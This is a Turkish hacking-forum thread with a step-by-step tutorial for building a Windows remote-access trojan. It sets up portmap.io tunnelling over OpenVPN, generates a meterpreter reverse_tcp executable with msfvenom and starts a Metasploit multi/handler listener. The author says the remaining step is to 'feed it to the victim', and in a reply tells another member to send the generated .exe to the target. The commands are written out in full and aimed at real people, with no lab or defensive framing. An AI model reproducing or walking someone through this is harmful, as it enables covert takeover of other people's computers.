M e t a Sploit Kullanımı Bütün Herşeyiyle ! Parrot,Kali Linux

Bugs Bunny

Uzman üye
29 Tem 2016
1,487
35
MSFVenom
Selam THT Üyeleri,​

Ben Uchiha-Sasuke​

Bu Konumda Size ****Sploit'i Kullanmayı Anlatıcam.​

Yapamayan Olmaz Bu kadar Emin konuşuyorum​

Ben işlemi Parrot üzerinden gerçekleştiricem, Siz kali linux üzerindende gerçekleştirebilirsiniz.​

İlk Öncelikle Tarayıcımıza Girip ''portmap.io'' yazıyoruz, ve siteye giriyoruz.​

P77dn6.png

SIGN-IN'e basıyoruz.​

LvvMnb.png

Önümüze kayıt olma bölümü çıktı, eposta adresini sallamayın çünkü aktivasyon kodu gönderilecek.
Aktivasyon Kodunu onaylıyoruz.

DOO17l.png

CREATE NEW CONFIGURATION'a basıyoruz.​

kMMQ6v.png

Yukardaki Name, Comment'i kafanıza göre yapın, ANCAK : Type ve Proto'yu benimki gibi yapın​

Sol Alttan ''Generate''ye basıyoruz, ardından download basıp Ufak bi dosya indiriyoruz , İndikten Create Basıyoruz.​

r0040B.png

Dosyamız bu Bunu Desktop(Masaüstü)'ne Atıyoruz.​

4ppAp0.png

Ardından Portmap'ye Kodumuz oluştu, Yukardaki MAPPING RULES'e Tıklıyoruz

gPPgbL.png

CREATE NEW RULE'ye Tıklıyoruz.​

866OXr.png

Hostname Yazan yerde 2.bölümde portmap.io'yu seçiyoruz, Port On Your PC'ye Açmak istediğiniz portu yazın Ben 3333 Yazdım.

XbbG36.png

Kırmızı Renk ile içeri aldığım bölümdeki Yazıyı Not Defterine Kaydetip, Siteyi kapatabiliriz.​

kMMQQW.png

Şimdi Terminalimizi Açıp Root Yetkisi Verelim.​

Ardından '' openvpn --config admin.deneme.ovpn(örnek bu) '' yazıp enter'liyoruz.​

DOO1bv.png

Enter'ledikten sonra terminalde en son bu yazdıysa olmuş demektir.

9YYzZ5.png

Şimdi yeni Bi terminal açıp Root yetkisi verelim.

Şimdi Dosyamızı oluşturucaz komutumuz şu :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(HOST İSMİNİZ) LPORT=(PORT SAYINIZ) -f exe > /home/letus/Desktop/(Dosya İsmi).exe

EOOL1z.png

Ardından Dosyamız Oluşuyor Şimdi Root Yetkisi Olan terminalimize ''msfconsole'' yazıyoruz.

dLLrVD.png

Msfconsolemiz açıldıktan sonra şu komutları yazıyoruz.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT (4 HANELİ PORTUMUZ YANİ BENİM İÇİN 3333)
set LHOST (admin-52178.portmap.io:52178) örnektir bu
exploit

Artık Bundan sonrası kurbana yedirmek :)

Çok emek verdim inşallah Bi teşekkürü çok görmezsiniz. :)

Moderatör tarafında düzenlendi:

TheKaanq

Yeni üye
3 Tem 2019
5
0
Cevap: ****Sploit Kullanımı Bütün Herşeyiyle ! Parrot,Kali Linux

herşey i sonuna kadar yaptım herşey oldu fakat karşı tarafa hangi dosyayı atacağız ve bilgiler nerede gözükecek

Bugs Bunny

Uzman üye
29 Tem 2016
1,487
35
MSFVenom
Cevap: ****Sploit Kullanımı Bütün Herşeyiyle ! Parrot,Kali Linux

herşey i sonuna kadar yaptım herşey oldu fakat karşı tarafa hangi dosyayı atacağız ve bilgiler nerede gözükecek

Karşıya msfvenom -p komuduyla başlarken en sonda /root/masaüstü/THT.exe (örnektir)

Oluşturduğun yerde çıkan dosyayı atıcaksın

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.